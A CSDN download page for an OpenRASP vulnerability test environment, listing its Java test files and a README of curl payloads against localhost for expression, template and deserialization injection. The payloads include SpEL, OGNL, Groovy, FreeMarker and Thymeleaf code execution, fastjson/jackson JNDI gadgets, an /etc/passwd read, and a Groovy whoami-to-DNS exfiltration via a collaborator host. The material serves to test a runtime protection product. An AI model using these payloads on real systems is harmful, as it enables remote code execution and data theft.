OpenRASP_漏洞测试环境_openrasp-testcases.zip资源-CSDN文库

共340个文件

java：101个

jsp：91个

xml：57个

需积分: 5 90 浏览量 2024-08-27 10:57:37 上传评论收藏 6.63MB ZIP 举报

资源推荐

资源详情

资源评论

收起资源包目录

OpenRASP_漏洞测试环境_openrasp-testcases.zip （340个子文件）

bootstrap.min.css 118KB

index.ftl 539B

.gitignore 821B

.gitignore 296B

.gitignore 30B

.gitignore 7B

.gitignore 6B

index.html 3KB

index.html 483B

index.html 389B

freemarker.iml 1KB

main1.iml 947B

fastjson.iml 867B

db2jcc4.jar 3.68MB

ojdbc14-10.2.0.2.0.jar 1.47MB

wxpay-sdk-3.0.9.jar 1.41MB

BaseSqlServlet.java 4KB

JDNI.java 4KB

Deserialization.java 3KB

Xxe_sax.java 2KB

UserService.java 2KB

Mysql.java 2KB

DNS.java 2KB

FreeMarkerController.java 2KB

MysqlPrepared.java 2KB

GroovyController.java 2KB

WriteFile.java 2KB

Test.java 2KB

Poc.java 2KB

Directory1.java 2KB

CommandEcho.java 2KB

Multipart_mysql.java 2KB

HttpClient.java 2KB

WebMvcConfig.java 2KB

Poc.java 2KB

Xxe_stax.java 2KB

FileUpload.java 2KB

HttpURLConnection.java 2KB

SerializeToFlatFile.java 2KB

Xxe_dom.java 2KB

CommonsFileUploadServlet.java 1KB

SqlException.java 1KB

SqlAccess.java 1KB

UserController.java 1KB

MybatisController.java 1KB

HttpCommonClient.java 1KB

Xxe_dom4j.java 1KB

Directory2.java 1KB

Xxe_jdom.java 1KB

SpelController.java 1KB

FileUploadServlet.java 1KB

VelocityController.java 1KB

ReadFile.java 1KB

OkHttp.java 1KB

SqlPolicy.java 1KB

OkHttp3.java 1KB

Poc.java 1KB

DemoApplication.java 1KB

JNDITask.java 1KB

Log.java 1KB

JoddController.java 1KB

FMServlet.java 1KB

JNDIBadTask.java 991B

Ognl.java 977B

MssqlServlet.java 959B

DNSTask.java 949B

FastJsonServlet.java 945B

PermissionInterceptor.java 940B

QLExpressController.java 918B

Body_Xss.java 908B

Command.java 906B

SqliteServlet.java 903B

BeanController.java 877B

Person.java 777B

WebSocketHandler.java 766B

Log4jController.java 762B

RegistryController.java 761B

OgnlController.java 748B

ReflectController.java 734B

FileUploadController.java 731B

ScriptEngineManagerController.java 728B

DB2Servlet.java 720B

App.java 705B

JacksonServlet.java 702B

FastJsonServlet.java 701B

JacksonController.java 690B

EmployeeMapper.java 683B

共 340 条

### 脚本执行 #### ScriptEngineManager ```bash curl 127.0.0.1:8080/script/javascript -d 'expression=java.lang.Runtime.getRuntime().exec("open /System/Applications/Calculator.app")' ``` #### EL ```bash curl 127.0.0.1:8080/el/parse -d 'expression=Runtime.getRuntime().exec("open /System/Applications/Calculator.app")' ``` #### groovy 接口 ```bash curl 127.0.0.1:8080/groovy/parse -H "Content-Type: text/plain" --data-binary @script.vy curl 127.0.0.1:8080/groovy/parseClass -H "Content-Type: text/plain" --data-binary @script.vy curl 127.0.0.1:8080/groovy/evaluate -H "Content-Type: text/plain" --data-binary @script.vy ``` 测试脚本 - AST ```groovy @groovy.transform.ASTTest(value={ assert java.lang.Runtime.getRuntime().exec("open /System/Applications/Calculator.app") }) def x ``` 测试脚本 - 需要联网 ```groovy import org.buildobjects.process.ProcBuilder @Grab('org.buildobjects:jproc:2.2.3') class Dummy{} print new ProcBuilder("open /System/Applications/Calculator.app").run().getOutputString() ``` 测试脚本 - 需要联网 ```groovy @GrabConfig(disableChecksums=true) @GrabResolver(name='payload', root='http://127.0.0.1') @Grab(group='package', module='payload', version='1') import Payload; ``` log4j ```groovy import org.apache.logging.log4j.*; Logger logger = LogManager.getLogger(getClass()); logger.info ('a={}', '${jndi:ldap://127.0.0.1:1389/a}'); ``` [dnslog + 结果上报](https://security.humanativaspa.it/groovy-template-engine-exploitation-notes-from-a-real-case-scenario/) ```groovy import groovy.*; @groovy.transform.ASTTest(value={ cmd = "whoami"; out = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmd.split(" ")).getInputStream()).useDelimiter("\\A").next() cmd2 = "ping " + out.replaceAll("[^a-zA-Z0-9]","") + ".XXXXX.burpcollaborator.net"; java.lang.Runtime.getRuntime().exec(cmd2.split(" ")) }) def x ``` #### ognl 普通执行 ```bash curl 127.0.0.1:8080/ognl/parse -d 'expression=#a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{"open", "/System/Applications/Calculator.app/"})).start()' ``` 执行JS脚本 ```bash curl 127.0.0.1:8080/ognl/parse -d 'expression=""["getClass"].forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\"open /\")")' ``` #### spel 普通执行 ```bash curl 127.0.0.1:8080/spel/parse -d 'expression=T(java.lang.Runtime).getRuntime().exec("open /System/Applications/Calculator.app")' ``` 读取输出: 用getErrorStream()读取stderr ```bash curl 127.0.0.1:8080/spel/parse -d 'expression=new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder("bash", "-c", "whoami").start().getInputStream(), "utf8")).readLine()' ``` class加载 ```bash curl 127.0.0.1:8080/spel/parse -d 'expression=T(org.springframework.cglib.core.ReflectUtils).defineClass("Foo",T(org.springframework.util.Base64Utils).decodeFromString("XXX"),new+javax.management.loading.MLet(new+java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()' ``` RMI ```bash curl 127.0.0.1:8080/spel/parse -d 'expression=new+javax.management.remote.rmi.RMIConnector(new javax.management.remote.JMXServiceURL("service:jmx:rmi://127.0.0.1:1389/jndi/ldap://127.0.0.1:1389/Basic/Command/Calc"),new java.util.Hashtable()).connect()' curl 127.0.0.1:8080/spel/parse -d 'expression=T(java.lang.System).setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true") %2B new javax.management.remote.rmi.RMIConnector(new javax.management.remote.JMXServiceURL("service:jmx:rmi://127.0.0.1:1389/jndi/ldap://127.0.0.1:1389/Basic/Command/Calc"), new java.util.Hashtable()).connect()' ``` #### mvel ```bash curl 127.0.0.1:8080/mvel/parse -d 'expression=Runtime.getRuntime().exec("open /System/Applications/Calculator.app")' ``` #### QLExpress ```bash curl 127.0.0.1:8080/qlexpress/parse -d 'expression=555-333' ``` ### 反序列化 #### JDBC socket factory ```bash curl 127.0.0.1:8080/drivermanager/connect -d 'url=jdbc:postgresql://localhost:5432/testdb?socketFactory%3dorg.springframework.context.support.ClassPathXmlApplicationContext%26socketFactoryArg=http://127.0.0.1:8000/bean-exec.xml' ``` ssl factory ```bash echo S | ncat -l -vv -p 5432 curl 127.0.0.1:8080/drivermanager/connect -d 'url=jdbc:postgresql://localhost:5432/testdb?sslfactory%3dorg.springframework.context.support.FileSystemXmlApplicationContext%26sslfactoryarg=http://127.0.0.1:8000/bean-exec.xml' ``` #### readObject() ```bash ysoserial CommonsCollections6 "open /System/Applications/Calculator.app" > test curl 127.0.0.1:8080/object/parse --data-binary @test -H 'Content-Type: text/plain' rm -f test ``` #### fastjson ``` curl 127.0.0.1:8080/fastjson/parse -d 'json={"@type":"org.apache.commons.proxy.provider.remoting.RmiProvider","host":"127.0.0.1",port:"1099","name":"Exploit"}' curl 127.0.0.1:8080/fastjson/parse -d 'json={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:1389/Exploit","autoCommit":true}' # 语法兼容性测试 curl 127.0.0.1:8080/fastjson/parse -d 'json={,,,,"user":"123",,,,,"111":222}' ``` #### jackson ``` curl 127.0.0.1:8080/jackson/parse -d 'json=["com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation":"ldap://127.0.0.1:1389/Exploit"}]' ``` #### xstream ``` curl 127.0.0.1:8080/xstream/parse -H 'Content-Type: text/xml' -d @test.xml ``` #### xmldecoder ``` curl 127.0.0.1:8080/xmldecoder/parse -H 'Content-Type: text/xml' -d @test.xml ``` #### jodd-json ``` curl 127.0.0.1:8080/jodd/parse -d 'type=com.mchange.v2.c3p0.JndiRefForwardingDataSource&json={"jndiName":"ldap://127.0.0.1:1389/Exploit","loginTimeout":0}' ``` ### 模板渲染 #### velocity ``` curl 127.0.0.1:8080/velocity/eval -d 'username=#set($exp%3d"");$exp.getClass().forName("java.lang.Runtime").getRuntime().exec("open /System/Applications/Calculator.app")' ``` #### freemarker JythonRuntime需要本地有class: https://tttang.com/archive/1412/ ``` curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign value%3d"freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("open /System/Applications/Calculator.app")</@value>' curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign value%3d"freemarker.template.utility.Execute"?new()>$${value("open /System/Applications/Calculator.app")}' curl 127.0.0.1:8080/freemarker/unsafe -d 'template=${"freemarker.template.utility.Execute"?new()("open /System/Applications/Calculator.app")}' ``` eval模式 ``` curl 127.0.0.1:8080/freemarker/eval -d 'username="freemarker.template.utility.Execute"?new()("open /System/Applications/Calculator.app")' ``` 写文件 ``` curl 127.0.0.1:8080/freemarker/eval -d 'username="freemarker.template.utility.ObjectConstructor"?new()("java.io.FileWriter","/tmp/test.txt").append("123").close()' ``` 执行命令 ``` curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","open","/System/Applications/Calculator.app").start()}' ``` 读文件 ``` curl 127.0.0.1:8080/freemarker/unsafe -d 'template=<#assign+value="freemarker.template.utility.ObjectConstructor"?new()("java.io.FileReader", "/etc/passwd")>${"freemarker.template.utility.ObjectConstructor"?new()("java.util.Scanner", value).next()}' ``` 执行SPEL ``` curl 127.0.0.1:8080/freemarker/unsafe -d 'template=${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("T(java.lang.Runtime).getRuntime().exec(\"open /System/Applications/Calculator.app\")").getValue()}' ``` #### thymeleaf模板注入 https://github.com/veracode-research/spring-view-manipulation ``` curl 'http://127.0.0.1:8080/thymeleaf/path?lang=__%24%7BT(java.lang.Runtime).getRuntime().exec(%27%6F%70%65%6E%20%2F%53%79%73%74%65%6D%2F%41%70%70%6C%69%63%61%74%69%6F%6E%73%2F%43%61%6C%63%75%6C%61%74%6F%72%2E%61%70%70%27)%7D__::

评论收藏

内容反馈